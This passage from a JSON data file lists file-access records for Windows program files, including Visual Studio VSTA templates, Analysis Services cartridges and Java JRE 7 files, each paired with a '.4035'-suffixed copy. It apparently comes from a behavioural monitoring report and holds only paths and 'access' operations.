8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\copyright.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\copyright", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\LICENSE.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\license.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\LICENSE", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\license", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\README.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\readme.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\README.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\readme.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\release.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\release.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\release", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\release", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\welcome.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\Welcome.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\welcome.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\classlist.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\classlist", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\currency.data.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data", "hashes": 